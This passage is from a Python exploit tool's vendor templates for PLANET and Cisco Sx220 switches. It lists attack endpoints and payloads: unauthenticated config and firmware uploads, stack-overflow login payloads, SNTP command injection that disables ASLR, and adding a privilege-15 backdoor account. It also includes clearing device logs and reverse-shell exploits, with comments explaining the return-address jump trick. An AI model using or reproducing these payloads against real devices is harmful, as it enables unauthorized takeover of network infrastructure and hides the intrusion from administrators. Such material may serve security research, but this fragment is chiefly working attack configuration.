+'_SHELLCODE',\r\n\t\t\t\t\t\t'START':0x10010104,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP' :0x10600604,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 28,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 20,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 0,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':False,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t}\r\n\r\n\t\t#\r\n\t\t# Vendor templates, Vendor_ETag() will be merged to here\r\n\t\t# (dont delete anything here thats not moved to Vendor_ETag())\r\n\t\t#\r\n\r\n\t\tVendor_Template = {\r\n\t\t\t#\r\n\t\t\t'Planet': {\r\n\t\t\t\t'vendor': 'PLANET Technology Corp.',\r\n\t\t\t\t'modulus_uri':'',\r\n\t\t\t\t'info_leak':False,\r\n\t\t\t\t'info_leak_JSON':False,\r\n\t\t\t\t'info_leak_uri':'',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':False,\r\n\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t'query':'username=USERNAME&password=PASSWORD&login=1',\r\n\t\t\t\t\t'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',\r\n\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': 
True,\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'LOGGING_SERVICE=0&cmd=5121',\r\n\t\t\t\t\t\t'status':'',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logfile_query':'cmd_5132=Clear+file+messages',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logmem_query':'cmd_5132=Clear+buffered+messages',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': {\r\n\t\t\t\t\t\t'httpuploadbakcfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"backup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadbakcfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpuploadruncfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httprestorecfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"startup-config\" (PoC: Create invalid file to 
verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httprestorecfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':'Image Signature Error',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'dispatcher.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t\t'content':'username=admin&password='+ self.random_string(184) + '&login=1',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 
credentials)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'encryption':'md5',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" secret encrypted PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t#'encryption':'nopassword',\r\n\t\t\t\t\t\t#'content':'Content-Type\\n\\nconfig-file-header\\nusername \"USERNAME\" nopassword\\n\\n------', # Yep, working too\r\n\t\t\t\t\t\t'add_uri':'/cgi-bin/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'', \r\n\t\t\t\t\t\t'del_uri':'/cgi-bin/dispatcher.cgi?cmd=526&usrName=USERNAME',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'enable_query':'sntp_enable=1&cmd=548',\r\n\t\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'inject_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'delete_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'delete_query':'sntp_Server=+&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'sntp_enable=0&cmd=548',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. 
[NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'&_CMD_&login=1',\r\n\t\t\t\t\t\t'sys_ping_post_check':'',\r\n\t\t\t\t\t\t'sys_ping_post_SIGSEGV': False,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'_CMD_&login=1',\r\n\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&LOGGING_SERVICE=0',# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':False,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'',\t\t\t\t\t\t# Clean RAM log CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':False,\t\t\t\t# Clean RAM log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'',\t\t\t\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':False,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: 
Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'_CMD_&login=1',\r\n\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=123',\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': False,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t\t'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&login=1',\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'Cisco': { \r\n\t\t\t\t'vendor': 'Cisco Systems, 
Inc.',\r\n\t\t\t\t'model':'Sx220',\r\n\t\t\t\t'uri':'https://www.cisco.com/c/en/us/support/switches/small-business-220-series-smart-plus-switches/tsd-products-support-series-home.html',\r\n\t\t\t\t'modulus_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'info_leak':True,\r\n\t\t\t\t'info_leak_JSON':True,\r\n\t\t\t\t'info_leak_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'xsid':True,\r\n\t\t\t\t'xsid_uri':'/cgi/get.cgi?cmd=home_main',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':True,\r\n\t\t\t\t\t'encryption':'rsa',\r\n\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t'query':'{\"_ds=1&username=USERNAME&password=PASSWORD&_de=1\":{}}',\r\n\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',\r\n\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=log_settings',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&ram_sev_0=on&ram_sev_1=on&ram_sev_2=on&ram_sev_3=on&ram_sev_4=on&ram_sev_5=on&ram_sev_6=on&_de=1\":{}}',\r\n\t\t\t\t\t\t'status':'/cgi/get.cgi?cmd=log_settings',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi/set.cgi?cmd=log_fileClear',\r\n\t\t\t\t\t\t'clean_logfile_query':'{\"\":{}}',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi/set.cgi?cmd=log_ramClear',\r\n\t\t\t\t\t\t'clean_logmem_query':'{\"\":{}}',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'httpuploadbakcfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"backup-config\" (PoC: Create invalid file to 
verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httpuploadbakcfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'content':'/mnt/backup-config',\r\n\t\t\t\t\t\t\t'content_check':'/mnt/backup-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpuploadlang.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"language\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httpuploadlang.cgi',\r\n\t\t\t\t\t\t\t'check_uri':False,\t\t# \r\n\t\t\t\t\t\t\t'content': self.random_string(30), # We checking returned 'errMsgLangMG' and LEN of this text\r\n\t\t\t\t\t\t\t'content_check':'errMsgLangMG',\t#\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpuploadruncfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/http_saverun_cfg',\r\n\t\t\t\t\t\t\t'content':'/var/config/running-config',\r\n\t\t\t\t\t\t\t'content_check':'/var/config/running-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httprestorecfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"startup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httprestorecfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'content':'/mnt/startup-config',\r\n\t\t\t\t\t\t\t'content_check':'/mnt/startup-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': 
True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/http_uploadfail',\r\n\t\t\t\t\t\t\t'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)\r\n\t\t\t\t\t\t\t'content_check':'Copy: Illegal software format',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'login.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/VUL.TXT', # We cannot control the content...\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(32) +'&password=/tmp/VUL.TXT&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'content_check':'2',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'set.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack 
overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'encryption':'md5',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nconfig-file-header\\nusername \"USERNAME\" secret encrypted PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t#'encryption':'nopassword',\r\n\t\t\t\t\t\t#'content':'Content-Type\\n\\nconfig-file-header\\nusername \"USERNAME\" nopassword\\n\\n------', # Yep, working too\r\n\t\t\t\t\t\t'add_uri':'/cgi/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'{\"_ds=1&user=USERNAME&_de=1\":{}}',\r\n\t\t\t\t\t\t'del_uri':'/cgi/set.cgi?cmd=aaa_userDel',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'enable_query':'{\"_ds=1&sntpStatus=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',\r\n\t\t\t\t\t\t'inject_query':'{\"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1\":{}}',\r\n\t\t\t\t\t\t'check_query':'{\"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > 
/tmp/check`&cursntpPort=123&_de=1\":{}}',\r\n\t\t\t\t\t\t'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',\r\n\t\t\t\t\t\t'delete_query':'{\"\":{}}',\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&sntpStatus=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\t\t\t\t\t\t'sys_ping_post_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\r\n\t\t\t\t\t\t'log_settings_set_cmd':'',\t\t\t\t\t# Disable 
Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':True,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'',\t\t\t\t\t\t# Clean RAM CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':True,\t\t\t\t# Clean RAM SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'',\t\t\t\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':True,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntpServer=+&cursntpPort=123',\t\t\t\t# CMD\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntpStatus=1',\t# Enable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntpStatus=0',\t# Disable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB 